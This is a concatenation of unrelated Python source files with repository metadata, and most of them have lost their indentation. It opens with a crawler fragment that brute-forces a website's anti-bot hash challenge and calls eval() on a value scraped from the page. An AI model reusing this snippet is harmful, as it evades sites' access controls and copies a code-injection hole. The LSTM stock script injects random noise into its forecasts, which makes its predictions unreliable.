import hashlib
data = json.loads(re.findall(r'go\((.*?)\)', html)[1])
chars_length = len(data.get('chars'))
for i in range(chars_length):
for j in range(chars_length):
result = data.get('bts')[0] + data.get('chars')[i] + data.get('chars')[j] + data.get('bts')[1]
b = eval('hashlib.{}()'.format(data.get('ha')))
b.update(result.encode(encoding='utf-8'))
res = b.hexdigest()
if res == data.get('ct'):
return result
| MuggleK/CrawlersTools | CrawlersTools/requests/base_requests.py | base_requests.py | py | 6,417 | python | en | code | 16 | github-code | 36 |
16275076473 | import json
import sys
import argparse
import os
APPROX = 0.1
def isNumber(num):
    """Return True when *num* can be converted to float, else False."""
    try:
        float(num)
    except Exception:
        # float() raises ValueError for bad strings, TypeError for bad types
        return False
    return True
# Stack of context names used to build the dotted path of each reported diff.
nameList = list()
def compareAny(self, other):
    """Generic attribute-wise comparison of two objects that declare
    attScalarList / attDictList / attListList.

    Scalars compare exactly, except that numeric values compare within a
    relative tolerance of APPROX. Nested comparable objects (anything with
    a `compare` attribute) recurse, pushing context names onto nameList.
    Returns a list of [label, self_value, other_value] difference triples.

    NOTE(review): the list-comparison branch labels its diffs with `attV`,
    a variable left over from the preceding dict loop -- the label refers
    to the wrong attribute and raises NameError when attDictList produced
    no iterations. The intended label presumably uses `attdName`/`ind`.
    NOTE(review): the dict and list branches use `selfAtt*APPROX` (not
    abs()) as the tolerance, unlike the scalar branch; for negative values
    the threshold goes negative and every pair is flagged -- confirm.
    """
    diff = list()
    # --- scalar attributes -------------------------------------------
    for att in self.attScalarList:
        selfAtt = getattr(self, att)
        otherAtt = getattr(other, att)
        # nested comparable objects recurse with context pushed
        if 'compare' in dir(selfAtt) and 'compare' in dir(otherAtt):
            nameList.append(self.name)
            nameList.append(att)
            retDiff = selfAtt.compare(otherAtt)
            if len(retDiff):
                diff += retDiff
            nameList.pop()
            nameList.pop()
            continue
        # numbers compare approximately, everything else exactly
        exact = True
        if isNumber(selfAtt) and isNumber(otherAtt):
            exact = False
            selfAtt = float(selfAtt)
            otherAtt = float(otherAtt)
        if (exact and selfAtt != otherAtt) or (not exact and abs(selfAtt-otherAtt)>abs(selfAtt)*APPROX):
            # print((exact and selfAtt != otherAtt), (not exact and abs(selfAtt-otherAtt)>abs(selfAtt)*APPROX), selfAtt, otherAtt, '--'*10)
            diff.append(['_'.join(nameList)+'_'+self.name+'_'+att, selfAtt, otherAtt])
    # --- dict attributes ---------------------------------------------
    for attdName in self.attDictList:
        attDSelf = getattr(self, attdName)
        attDOther = getattr(other, attdName)
        attDSelfKeys = set(attDSelf.keys())
        attDOtherKeys = set(attDOther.keys())
        # report any key present on only one side
        if len(attDSelfKeys.symmetric_difference(attDOtherKeys)):
            diff.append(['_'.join(nameList)+'_'+self.name+'_'+attdName+'_DifferentKeys' , list(attDSelf.keys()), list(attDOther.keys())])
        attDAll = set()
        [attDAll.add(x) for x in attDSelf]
        [attDAll.add(x) for x in attDOther]
        # compare values for keys present on both sides
        for attV in attDAll:
            if attV in attDSelf and attV in attDOther:
                if 'compare' in dir(attDSelf[attV]) and 'compare' in dir(attDOther[attV]):
                    nameList.append(self.name)
                    nameList.append(attdName)
                    retDiff = attDSelf[attV].compare(attDOther[attV])
                    if len(retDiff):
                        diff += retDiff
                    nameList.pop()
                    nameList.pop()
                    continue
                elif isNumber(attDSelf[attV]) and isNumber(attDOther[attV]):
                    selfAtt = float(attDSelf[attV])
                    otherAtt = float(attDOther[attV])
                    if abs(selfAtt-otherAtt)>selfAtt*APPROX:
                        diff.append(['_'.join(nameList)+'_'+self.name+'_'+attdName+'_'+attV , attDSelf[attV], attDOther[attV]])
                    continue
                else:
                    if attDSelf[attV] != attDOther[attV]:
                        diff.append(['_'.join(nameList)+'_'+self.name+'_'+attdName+'_'+attV , attDSelf[attV], attDOther[attV]])
    # --- list attributes ---------------------------------------------
    for attdName in self.attListList:
        selfO = getattr(self, attdName)
        othrO = getattr(other, attdName)
        selfLen = len(selfO)
        otherLen = len(othrO)
        # differing lengths short-circuit the element comparison
        if selfLen != otherLen:
            diff.append(['_'.join(nameList)+'_'+self.name+'_'+attdName+'_Length' , selfLen, otherLen])
            continue
        if selfO == othrO: continue
        for ind in range(selfLen):
            if 'compare' in dir(selfO[ind]) and 'compare' in dir(othrO[ind]):
                nameList.append(self.name)
                nameList.append(attdName)
                retDiff = selfO[ind].compare(othrO[ind])
                if len(retDiff):
                    diff += retDiff
                nameList.pop()
                nameList.pop()
                continue
            elif isNumber(selfO[ind]) and isNumber(othrO[ind]):
                selfAtt = float(selfO[ind])
                otherAtt = float(othrO[ind])
                if abs(selfAtt-otherAtt)>selfAtt*APPROX:
                    # NOTE(review): `attV` here is stale (see docstring)
                    diff.append(['_'.join(nameList)+'_'+self.name+'_'+attdName+'_'+attV , selfO[ind], othrO[ind]])
                continue
            else:
                if selfO[ind] != othrO[ind]:
                    # NOTE(review): `attV` here is stale (see docstring)
                    diff.append(['_'.join(nameList)+'_'+self.name+'_'+attdName+'_'+attV , selfO[ind], othrO[ind]])
    return diff
class App:
class Access:
attScalarList = ['calls', 'amount', 'CacheLineNumber', 'CacheLineUtil', 'used', 'strideSumm', 'pattern', 'accessSize', 'intensity', 'execSize', 'isSlm', 'bti'] # TODO , 'CacheLineMax', 'CacheLineMin'
attDictList = ['stride'] # TODO
attListList = ['distribution', 'sends', 'sourceMap'] # TODO
def __init__(self, data):
for att in self.attScalarList:
setattr(self, att, data[att])
for att in self.attDictList:
setattr(self, att, data[att])
for att in self.attListList:
setattr(self, att, data[att])
self.name = '0x0' if len(data['sends']) == 0 else str(data['sends'][0])
def compare(self, other):
return compareAny(self, other)
class SendData:
attScalarList = ['calls', 'amount', 'CacheLineNumber', 'CacheLineUtil', 'used', 'transferred', 'strideSumm', 'pattern'] # , 'CacheLineMax', 'CacheLineMin'
attDictList = ['stride']
attListList = ['distribution']
def __init__(self, data):
for att in self.attScalarList:
setattr(self, att, data[att])
self.stride = data['stride']
self.distribution = data['distribution']
self.name = str(data['name'])
def compare(self, other):
return compareAny(self, other)
class AggrD:
mems = ['Local', 'Global']
rws = ['Read', 'Write']
tus = ['Used', 'Transferred', 'CacheLineNumber', 'Calls']
def getListAttributes(self):
ls = list()
for mem in App.AggrD.mems:
for rw in App.AggrD.rws:
for tu in App.AggrD.tus:
ls.append('ad{}{}{}'.format(mem, rw, tu))
return ls
def __init__(self, data):
self.attScalarList = self.getListAttributes()
self.attDictList = []
self.attListList = []
for att in self.attScalarList:
setattr(self, att, data[att])
self.name = 'name'
def compare(self, other):
return compareAny(self, other)
class Kernel:
class Enqueue:
attScalarList = ['id', 'totalThreadsExecuted', 'aggregatedDataTotal', 'aggregatedDataAvg']
attDictList = ['sendDataTotal']
# attDictList = []
attListList = ['accesses']
def __init__(self, data):
for att in self.attScalarList:
setattr(self, att, data[att])
self.sendDataTotal = dict()
for ky in data['sendDataTotal']:
data['sendDataTotal'][ky]['name'] = str(ky)
self.sendDataTotal[ky] = App.SendData(data['sendDataTotal'][ky])
self.aggregatedDataTotal = App.AggrD(data['aggregatedDataTotal'])
self.aggregatedDataAvg = App.AggrD(data['aggregatedDataAvg'])
self.accesses = list()
for acc in data['accesses']:
self.accesses.append(App.Access(acc))
self.name = str(data['id'])
def compare(self, other):
return compareAny(self, other)
attScalarList = ['name', 'enqueueNum', 'accessNum']
attDictList = ['enqueues']
attListList = []
def __init__(self, data):
for att in self.attScalarList:
setattr(self, att, data[att])
self.enqueues = dict()
for enqueue in data['enqueues']:
self.enqueues[enqueue] = App.Kernel.Enqueue(data['enqueues'][enqueue])
self.name = str(data['name'])
def compare(self, other):
return compareAny(self, other)
attScalarList = ['name', 'collectPercentage', 'envVars', 'analysisVersion'] # 'sourceFiles', 'date', 'resultsDir', 'applicationBin', 'workDirectory',
attDictList = ['kernels']
attListList = ['parameters']
def __init__(self, data):
for att in App.attScalarList:
setattr(self, att, data[att])
self.kernels = dict()
for kernelName in data["kernels"]:
self.kernels[kernelName] = App.Kernel(data["kernels"][kernelName])
self.parameters = data['parameters']
self.name = str(data['name'])
def __str__(self):
string = ''
for att in App.attScalarList:
string += '{}:{}, '.format(att,getattr(self, att))
return string
def compare(self, other):
return compareAny(self, other)
def readResults(path):
with open(path) as f:
data = json.load(f)
return App(data)
def main(argv):
parser = argparse.ArgumentParser(description='GPU Memory Access Ananlysis')
parser.add_argument(
'-r1',
metavar='DIRECTORY',
default='',
dest='results1',
type=str,
help='first result')
parser.add_argument(
'-r2',
metavar='DIRECTORY',
default='',
dest='results2',
type=str,
help='second result')
parser.add_argument(
'-f',
metavar='DIRECTORY',
default='',
dest='folder',
type=str,
help='Report directory')
if argv == 'sys':
args = parser.parse_args()
elif isinstance(argv, list):
args = parser.parse_args(argv)
else:
print('Arguments not recognized')
return -1
results1 = readResults(args.results1)
# print(results1)
results2 = readResults(args.results2)
# print(results2)
# print('calc diff')
diff = results1.compare(results2)
# print txt
print('\n\n\nDIFFERENCE:')
print(diff.__str__().replace('[','\n['))
if os.path.isdir(args.folder):
# save diff to json
with open(os.path.join(args.folder, 'compare_report.json'), 'w') as f:
f.write(json.dumps(diff))
# save to txt
with open(os.path.join(args.folder, 'compare_report.txt'), 'w') as f:
f.write(diff.__str__().replace('[','\n['))
return len(diff)
if __name__ == '__main__':
sys.exit(main('sys'))
| Priyankajaiswalintel/gramine | latest/bin64/gma/MAAT/compare.py | compare.py | py | 10,364 | python | en | code | null | github-code | 36 |
9156690869 | import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import random
from matplotlib.animation import FuncAnimation
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
def randomwalk3D(n, angle_degrees, escape_radius=100):
x, y, z = np.zeros(n), np.zeros(n), np.zeros(n)
angle_rad = np.radians(angle_degrees)
current_direction = np.array([1, 0, 0]) # Initial direction (e.g., to the right)
def density(x, y, z):
# Define a density function that varies with position
# You can modify this function to create your desired gradient
return 1.0 / (1.0 + np.sqrt(x**2 + y**2 + z**2))
for i in range(1, n):
# Calculate the distance from the origin (sun)
distance = np.sqrt(x[i - 1]**2 + y[i - 1]**2 + z[i - 1]**2)
if distance > escape_radius:
# If outside the escape radius, move straight in the current direction
x[i] = x[i - 1] + current_direction[0]
y[i] = y[i - 1] + current_direction[1]
z[i] = z[i - 1] + current_direction[2]
else:
# Generate a random reflection angle within the specified range
reflection_angle = np.random.uniform(-angle_rad, angle_rad)
# Generate a random axis of rotation (x, y, or z)
axis = random.choice([0, 1, 2])
# Create a 3D rotation matrix based on the chosen axis and angle
rotation_matrix = np.identity(3)
if axis == 0:
rotation_matrix = np.dot(np.array([[1, 0, 0],
[0, np.cos(reflection_angle), -np.sin(reflection_angle)],
[0, np.sin(reflection_angle), np.cos(reflection_angle)]]), rotation_matrix)
elif axis == 1:
rotation_matrix = np.dot(np.array([[np.cos(reflection_angle), 0, np.sin(reflection_angle)],
[0, 1, 0],
[-np.sin(reflection_angle), 0, np.cos(reflection_angle)]]), rotation_matrix)
else:
rotation_matrix = np.dot(np.array([[np.cos(reflection_angle), -np.sin(reflection_angle), 0],
[np.sin(reflection_angle), np.cos(reflection_angle), 0],
[0, 0, 1]]), rotation_matrix)
# Apply the rotation to the current direction
current_direction = np.dot(rotation_matrix, current_direction)
# Adjust the probability of reflection based on density
reflection_prob = density(x[i - 1], y[i - 1], z[i - 1])
if np.random.rand() > reflection_prob:
current_direction = -current_direction # Reflect back
# Update the position
x[i] = x[i - 1] + current_direction[0]
y[i] = y[i - 1] + current_direction[1]
z[i] = z[i - 1] + current_direction[2]
return x, y, z
# Number of iterations
num_iterations = int(1e3)
# Lists to store escape times for each iteration
escape_times = []
iteration_numbers = []
num_escapes = 0
# Define the sun_radius
sun_radius = int(1e2)
# 3D figure and axis for the entire plot
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(111, projection='3d')
# List to store the line objects for each frame
all_lines = []
# Function to initialize the animation
def init():
for line in all_lines:
line.set_data([], [])
line.set_3d_properties([])
average_escape_text.set_text('')
escape_count_text.set_text('')
return all_lines + [average_escape_text, escape_count_text]
# Function to calculate and update the average escape time
def update_average_escape(iteration):
if len(escape_times) > 0:
average_escape = sum(escape_times) / len(escape_times)
average_escape_text.set_text(f'Average Counts to Escape: {average_escape:.2f}')
else:
average_escape_text.set_text('')
return average_escape_text,
# Function to animate frames and define escape parameters
def animate(iteration):
global num_escapes # Add this line to indicate num_escapes is a global variable
n_steps = int(5e4)
reflection_angle_degrees = random.uniform(0, 180)
x_data, y_data, z_data = randomwalk3D(n_steps, reflection_angle_degrees)
distances = np.sqrt(x_data**2 + y_data**2 + z_data**2)
escape_radius = int(1e2)
escape_time = np.argmax(distances > escape_radius)
if escape_radius < escape_time:
num_escapes += 1
escape_times.append(escape_time)
iteration_numbers.append(iteration + 2)
line, = ax.plot(x_data, y_data, z_data, '-', linewidth=0.5, alpha=0.5, color=np.random.rand(3,))
all_lines.append(line)
# Update the average escape text
average_escape_text.set_text(f'Mean escape counts: {np.mean(escape_times):.2f}')
# Update the escape count text
escape_count_text.set_text(f'Escapes: {num_escapes} / {n_steps}')
iteration_count_text.set_text(f'Iteration: {iteration}')
return all_lines + [average_escape_text, escape_count_text, iteration_count_text]
# Create a text annotation for displaying average escape time and counts
average_escape_text = ax.text2D(0.005, 0.005, '', transform=ax.transAxes, fontsize=10, color='black')
escape_count_text = ax.text2D(0.005, 0.035, '', transform=ax.transAxes, fontsize=10, color='black')
iteration_count_text = ax.text2D(0.005, 0.07, '', transform=ax.transAxes, fontsize=10, color='black')
# Create the animation
ani = FuncAnimation(fig, animate, frames=num_iterations, init_func=init, interval = 0.1, blit=True, repeat=False)
# Create a sphere to represent the Sun
u = np.linspace(0, 2 * np.pi, 100)
v = np.linspace(0, np.pi, 100)
x_sun = sun_radius * np.outer(np.cos(u), np.sin(v))
y_sun = sun_radius * np.outer(np.sin(u), np.sin(v))
z_sun = sun_radius * np.outer(np.ones(np.size(u)), np.cos(v))
ax.plot_surface(x_sun, y_sun, z_sun, color='yellow', alpha=0.3)
# Define Plot
ax.set_title('Psudo Sun Simulator')
ax.set_xlim(-150, 150)
ax.set_ylim(-150, 150)
ax.set_zlim(-150, 150)
plt.show()
# Create a histogram with 1000 bins
histogram = input("Histogram plot? (y or any other key for no): ")
if histogram == 'y':
plt.figure()
plt.hist(escape_times, bins=1000, color='blue', alpha=0.7)
plt.xlabel('Escape Time')
plt.ylabel('Frequency')
plt.title('Escape Time Histogram')
plt.show()
| shafransky93/PsudoSunSimulator | randwalk.py | randwalk.py | py | 6,660 | python | en | code | 0 | github-code | 36 |
38826761471 | from subprocess import Popen, PIPE
from os import listdir
from os.path import isfile, join
from filecmp import cmp
import time
dirs = [('error_tests', ''),
('Tests', ''),
('ex1_Tests', ''),
('rotate_error_tests', '-rotate')]
for dir, args in dirs:
print("run %s tests" % dir)
tests = [f for f in listdir(dir) if isfile(join(dir, f)) and join(dir, f).endswith(".in")]
for test in tests:
if args == '':
p = Popen(['./ex3', join(dir,test), 'b'], stdin=PIPE, stdout=PIPE, stderr=PIPE)
else:
p = Popen(['./ex3', join(dir, test), 'b', args], stdin=PIPE, stdout=PIPE, stderr=PIPE)
time.sleep(0.1)
output_file = join(dir,test.replace('.in','.out'))
with open("b") as f1:
with open(output_file) as f2:
str1 = f1.read()
str2 = f2.read()
if str1 != str2:
print("test - %s\noutput - %s\n" % (test, output_file))
print(str1 + "\n\n" + str2)
| tauCourses/puzzel | error_tests.py | error_tests.py | py | 1,047 | python | en | code | 0 | github-code | 36 |
13957012079 | import tensorflow as tf
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from numpy.random import random_integers
import os
import pandas as pd
from math import floor
# Matplotlib fig params
mpl.rcParams['figure.figsize'] = (8, 6)
mpl.rcParams['axes.grid'] = False
# Enable eager for easy to use TF
#tf.enable_eager_execution()
def getData(location):
# Get the data into pandas df
data = pd.read_csv(location)
# Univariate data for close indexed on data -> numpy array
uni_data = data.iloc[:, 5]
uni_data.index = data['Date']
uni_data = uni_data.values
return uni_data
def univariate_data(dataset, start_index, end_index, history_size, target_size):
data = []
labels = []
start_index = start_index + history_size
if end_index is None:
end_index = len(dataset) - target_size
for i in range(start_index, end_index):
# Every group of 20
indices = range(i - history_size, i)
# Reshape data from (history_size,) to (history_size, 1)
# Data is now groups of 20 records - x data
data.append(np.reshape(dataset[indices], (history_size, 1)))
# Labels = the day to predict in question - y data
labels.append(dataset[i + target_size])
return np.array(data), np.array(labels)
def getData(location):
# Get the data into pandas df
data = pd.read_csv(location)
# Univariate data for close indexed on data -> numpy array
uni_data = data.iloc[:, 5]
uni_data.index = data['Date']
uni_data = uni_data.values
return uni_data
def normalizeData(TRAIN, uni_data):
# Getting training data metrics
uni_train_min = np.amin(uni_data[:TRAIN])
uni_train_max = np.amax(uni_data[:TRAIN])
uni_data = (uni_data - uni_train_min) / uni_train_max
return uni_data, uni_train_min, uni_train_max
def trainValSplit(uni_data, TRAIN, HISTORIC_REC, TARGET_REC):
# This will be:
# x = previous records
# y = next record prediction
x_train_uni, y_train_uni = univariate_data(uni_data, 0, TRAIN,
HISTORIC_REC,
TARGET_REC)
x_val_uni, y_val_uni = univariate_data(uni_data, TRAIN, None,
HISTORIC_REC,
TARGET_REC)
return x_train_uni, y_train_uni, x_val_uni, y_val_uni
def create_time_steps(length):
return list(range(-length, 0))
def show_plot(plot_data, delta, title):
labels = ['History', 'True Future', 'Model Prediction']
marker = ['.-', 'rx', 'go']
time_steps = create_time_steps(plot_data[0].shape[0])
if delta:
future = delta
else:
future = 0
plt.title(title)
for i, x in enumerate(plot_data):
if i:
plt.plot(future, plot_data[i], marker[i], markersize=10,
label=labels[i])
else:
plt.plot(time_steps, plot_data[i].flatten(), marker[i], label=labels[i])
plt.legend()
plt.xlim([time_steps[0], (future + 5) * 2])
plt.xlabel('Time-Step')
return plt
def showSampleExample(x_train_uni, y_train_uni, val):
plot = show_plot([x_train_uni[val], y_train_uni[val]], 0, 'Sample Example')
plt.show()
def baseline(history):
return np.mean(history)
def showBaselinePrediction(x_train_uni, y_train_uni, val):
plot = show_plot([x_train_uni[val], y_train_uni[val], baseline(x_train_uni[val])], 0,
'Baseline Prediction Example')
plt.show()
def batchAndShuffleData(BUFFER_SIZE, BATCH_SIZE, x_train_uni, y_train_uni, x_val_uni, y_val_uni):
train_univariate = tf.data.Dataset.from_tensor_slices((x_train_uni, y_train_uni))
train_univariate = train_univariate.cache().shuffle(BUFFER_SIZE).batch(BATCH_SIZE, drop_remainder=True).repeat()
val_univariate = tf.data.Dataset.from_tensor_slices((x_val_uni, y_val_uni))
val_univariate = val_univariate.batch(BATCH_SIZE, drop_remainder=True).repeat()
return train_univariate, val_univariate
def createModel(tensorShape):
simple_lstm_model = tf.keras.models.Sequential([
tf.keras.layers.LSTM(8, input_shape=tensorShape),
tf.keras.layers.Dense(1)
])
simple_lstm_model.compile(optimizer='adam', loss='mae')
return simple_lstm_model
# for x, y in val_univariate.take(1):
# print(simple_lstm_model.predict_on_batch(x).shape)
##### 2
def CreateModel(train_data_shape):
model = createModel(train_data_shape[-2:])
return model
##### 1
def PrepTrainData(location):
HISTORIC_REC = 30
TARGET_REC = 0
BATCH_SIZE = 1
BUFFER_SIZE = 200
data = getData(location)
TRAIN = floor(0.8 * len(data))
ndata, nmin, nmax = normalizeData(TRAIN, data)
x_train_uni, y_train_uni, x_val_uni, y_val_uni = trainValSplit(ndata, TRAIN, HISTORIC_REC, TARGET_REC)
train_univariate, val_univariate = batchAndShuffleData(BUFFER_SIZE, BATCH_SIZE, x_train_uni, y_train_uni, x_val_uni, y_val_uni)
return train_univariate, val_univariate, x_train_uni.shape
#### 3
def TrainModel(model, train_univariate, val_univariate, filename):
EVALUATION_INTERVAL = 200
EPOCHS = 50
model.fit(train_univariate, epochs=EPOCHS,
steps_per_epoch=EVALUATION_INTERVAL,
validation_steps=50,
validation_data=val_univariate)
model.save("trained/trained_model"+filename)
return model
def LoadModel(m_name):
model = tf.keras.models.load_model(m_name)
return model
def GetPrediction(dataset, model, forecast):
if forecast > 30:
forecast = 30
# plt.plot(data)
hdata, nmin, nmax = normalizeData(len(dataset), dataset)
hdata = hdata[-30:]
p_ya = np.array([])
p_x = np.arange(len(dataset), len(dataset) + forecast)
for x in range(0, forecast):
hdata = hdata.reshape(1, 30, 1)
y_hat = model.predict(hdata)
y_hat = Noys(y_hat)
# if abs(y_hat - p_ya[-1]) > 0.5*y_hat:
# y_hat = y_hat/5
hdata = np.append(hdata, y_hat)
hdata = np.delete(hdata, 0)
p_ya = np.append(p_ya, y_hat)
p_ya = p_ya * nmax + nmin
diffy = dataset[-1] - p_ya[0]
p_ya = p_ya + diffy
# plt.plot(p_x, p_ya)
# plt.show()
return np.ndarray.tolist(p_ya)
def Noys(y_hat):
noys = random_integers(-2, 2)
if noys % 2 == 0:
if noys > 1:
y_hat = y_hat + y_hat*0.30
elif noys < 1:
y_hat = y_hat - y_hat*0.30
else:
if noys > 1:
y_hat = y_hat + y_hat*0.15
elif noys < 1:
y_hat = y_hat - y_hat*0.15
return y_hat
def GetTrainedModel(path: str):
t_m = LoadModel(path)
return t_m
# GetPrediction('../data/AAPL.csv', t_m, 20)
def TrainSet():
model = CreateModel((30, 1))
for filename in os.listdir("/Users/christopherochs/financial-forecasting-api/models/data"):
if filename.endswith(".csv"):
print('../data/' + filename)
train, val, t_shape = PrepTrainData('../data/' + filename)
model = TrainModel(model, train, val, filename)
def TestModels(filename, dataname):
model = LoadModel('trained/'+filename)
d = getData('../data/' + dataname)
d = d[-100:]
p_x = np.arange(len(d), len(d) + 5)
y = GetPrediction(d, model, 5)
plt.title(filename + " on " + dataname)
plt.plot(d)
plt.plot(p_x, y)
plt.show()
| ptallo/financial-forecasting-api | models/univarmodel.py | univarmodel.py | py | 7,529 | python | en | code | 0 | github-code | 36 |
1467605788 | # from PIL import Image
#
# def abrirImagem():
# im = Image.open("sample-image.png")
#
#
import csv
import sqlite3
from PIL import Image
def abrir_imagem(imagem):
#im = Image.open("sample-image.png")
im = Image.open(imagem)
im.show()
def consultar_imagem(item):
try:
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
dados = (item[0])
cur.execute('SELECT imagem FROM produtos WHERE codcli = ?',(dados,))
con.commit()
resposta = cur.fetchone()
nome_arquivo = f'c:\marcelo\projetos\python\catalogo\imgconv\{item[0]}.jpg'
writeTofile(resposta[0], nome_arquivo)
abrir_imagem(nome_arquivo)
print(f'Código {item[0]} consultado com sucesso.')
cur.close()
con.close()
except sqlite3.Error as erro:
print(f'Erro na consulta {item[0]}.',erro)
def convertToBinaryData(filename):
# Convert digital data to binary format
with open(filename, 'rb') as file:
binaryData = file.read()
return binaryData
def writeTofile(data, filename):
# Convert binary data to proper format and write it on Hard Disk
with open(filename, 'wb') as file:
file.write(data)
print(filename)
print("Stored blob data into: ", filename, "\n")
def inserir_bd(item):
try:
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
cur.execute('insert into prod_cliente (codpro, descricao, embalagem, preco_cx, preco_un, cod_barras, categoria) values (?,?,?,?,?,?,?)',item,)
con.commit()
#print(f'Item {item[0]} incluso com sucesso.')
cur.close()
con.close()
except sqlite3.Error as erro:
print(f'Erro na inclusão {item[0]}.',erro)
def contar_itens():
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
cur.execute('SELECT * FROM prod_cliente',)
print(f'Quantidade de itens inseridos no catálogo: {len(cur.fetchall())}')
cur.close()
con.close()
def inserir_imagem(item):
try:
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
dados = (None,item[6], item[0])
cur.execute('INSERT INTO produtos (cod_barras, imagem, codcli) values (?, ?, ?)',dados,)
con.commit()
print(f'Código {item[0]} atualizado com sucesso.')
cur.close()
con.close()
except sqlite3.Error as erro:
print(f'Erro na atualização {item[0]}.',erro)
def atualizar_bd(item):
try:
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
#soh atualiza com preco diferente
# dados = (item[1],item[2], item[3], item[4],item[5], item[6], item[0],item[3])
# cur.execute('UPDATE prod_cliente SET descricao = ?, embalagem = ?, preco_cx = ?, preco_un = ?, cod_barras = ?, categoria = ? WHERE codpro = ? and preco_cx != ?',dados,)
#atualiza tudo
dados = (item[1],item[2], item[3], item[4],item[5], item[6], item[0])
cur.execute('UPDATE prod_cliente SET descricao = ?, embalagem = ?, preco_cx = ?, preco_un = ?, cod_barras = ?, categoria = ? WHERE codpro = ?',dados,)
con.commit()
print(f'Código {item[0]} atualizado com sucesso.')
cur.close()
con.close()
except sqlite3.Error as erro:
print(f'Erro na atualização {item[0]}.',erro)
def ler_arquivo():
with open ('produtos.txt', 'r') as f:
lista = []
for row in csv.reader(f,delimiter=';'):
lista.append(row)
for linha in lista:
item = []
preco_novo = linha[6].replace(',','.')
preco_novo = "{:.2f}".format(float(preco_novo))
##Troca , por .
preco_novo_un = linha[8].replace(',','.')
##tranforma para numero real com 2 digitos apos o ponto
preco_novo_un = "{:.2f}".format(float(preco_novo_un))
# if preco_novo_un == '0.00':
# print("Código: " + linha[0] + " Descrição: " + linha[1] + " Emb: " + linha[3] + " Preço un: R$ " + str(
# preco_novo))
# else:
# print("Código: "+linha[0]+" Descrição: "+linha[1]+" Emb: "+linha[3]+" Preço cx: R$ "+str(preco_novo)+ " Preço un: R$ "+str(preco_novo_un))
item.append(linha[0])
item.append(linha[1])
item.append(linha[3])
item.append(linha[6])
if linha[8] !='0':
item.append(linha[8])
else:
item.append(linha[6])
item.append(0000000000000) #codigo de barras
categoria = linha[11].split(' ')
#print(categoria[1])
#Coloca os nomes das categorias no BD
#categoria = linha[11]
if categoria[1] == 'ADAMS' or categoria[1] == 'ARCOR' or categoria[1] == 'CAMPESTRE' or categoria[1] == 'DALVA' or categoria[1] == 'DORI' or categoria[1] == 'AMENDUPA' or categoria[1] == 'FINI' or categoria[1] == 'FLORESTAL' or categoria[1] == 'Jazam' or categoria[1] == 'LUIZ' or categoria[1] == 'PECCIN' or categoria[1] == 'RICLAN' or categoria[1] == 'SANTA' or categoria[1] == 'Uniao' or categoria[1] == 'GAROTO' or categoria[1] == 'Quero' or categoria[1] == 'NESTLE':
item.append('DOCES e SALGADINHOS')
#categoria[1]= 'DOCES e SALGADINHOS'
elif categoria[1] == 'BDL' or categoria[1] == 'ADN' or categoria[1] == 'BIC' or categoria[1] == 'DEYCON' or categoria[1] == 'FEIJAO' or categoria[1] == 'ERVA' or categoria[1] == 'FEIJAO' or categoria[1] == 'GERAL' or categoria[1] == 'KRAFT' or categoria[1] == 'LIMPINHA' or categoria[1] == 'MARANATA' or categoria[1] == 'MARTINS' or categoria[1] == 'MEMPHIS' or categoria[1] =='OWENS-ILLINOIS' or categoria[1] == 'VASSOURAS' or categoria[1] == 'ZETTAPACK'or categoria[1] == 'TELL'or categoria[1] == 'ODERICH' or categoria[1] == 'Mococa' or categoria[1] == 'Queijo' :
item.append('MERCEARIA')
#categoria[1] == 'MERCEARIA'
elif categoria[1] == 'FONT' or categoria[1] == 'BEBIDAS' or categoria[1] == 'PINGO' or categoria[1] == 'SUCO':
item.append('BEBIDAS')
#categoria[1] == 'BEBIDAS'
elif categoria[1] == 'GIRANDO' or categoria[1] == 'SANY' or categoria[1] == 'BRILHOLAC':
#categoria[1] == 'GIRANDO SOL'
item.append('LIMPEZA')
elif categoria[1] == 'DU':
#categoria[1] == 'CONDIMENTOS'
item.append('CONDIMENTOS')
elif categoria[1] == 'ELMA':
#categoria[1] == 'ELMA CHIPS'
item.append('ELMA CHIPS')
elif categoria[1] == 'Biscoitos':
item.append('Biscoitos SAGRA')
elif categoria[1] == 'TUBARAO' or categoria[1] == 'SIRIUS' or categoria[1] == 'HIGIE' or categoria[1] == 'TISCOSKI' or categoria[1] == 'GREEN' or categoria[1] == 'FRALDA':
#categoria[1] == 'HIGIENE PESSOAL'
item.append('HIGIENE PESSOAL')
elif categoria[1] == 'MC' or categoria[1] == 'ORLEPLAST' or categoria[1] == 'PLAZAPEL' or categoria[1] == 'LIPLAST' or categoria[1] == 'TOTALPLAST'or categoria[1] == 'EMBRAST'or categoria[1] == 'VABENE':
#categoria[1] == 'DESCARTÁVEIS'
item.append('DESCARTÁVEIS')
elif categoria[1] == 'MULTINACIONAL' or categoria[1] == 'PLASCOR' or categoria[1] == 'RELUZ' or categoria[1] == 'OUROLUX' or categoria[1] == 'PARANA'or categoria[1] == 'PIRISA' or categoria[1] == 'BLUMENAU' or categoria[1] == 'Alcool' or categoria[1] == 'CARVAO' or categoria[1] == 'THREE' or categoria[1] == 'FIBRAFORM':
#categoria[1] == 'UTILIDADES'
item.append('BAZAR E UTILIDADES')
else:
item.append(categoria[1])
#Aqui insere todos os itens novamente
inserir_bd(item)
#Aqui eh pra usar opcao de atualizar os preços
#atualizar_bd(item)
#img = convertToBinaryData('img/semfoto.jpg')
#item.append(img)
#inserir_imagem(item)
def listar_produtos():
try:
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
produtos=[]
# cur.execute('SELECT codpro, descricao, categoria, embalagem, preco_cx, preco_un FROM prod_cliente ORDER BY categoria, descricao')
cur.execute(
'SELECT codpro, descricao, categoria, embalagem, preco_cx, preco_un, categoria FROM prod_cliente WHERE categoria NOT Null ORDER BY categoria, descricao')
produtos = cur.fetchall()
cur.close()
con.close()
return produtos
except sqlite3.Error as erro:
print('Erro na consulta.',erro)
def apagar_itens_cliente():
try:
con = sqlite3.connect('catalogo.db')
cur = con.cursor()
cur.execute(
'DELETE FROM prod_cliente')
print(f'Total de itens apagados: {cur.rowcount}')
con.commit()
cur.close()
con.close()
except sqlite3.Error as erro:
print('Erro ao apagar itens do banco.',erro)
if __name__ == '__main__':
apagar_itens_cliente()
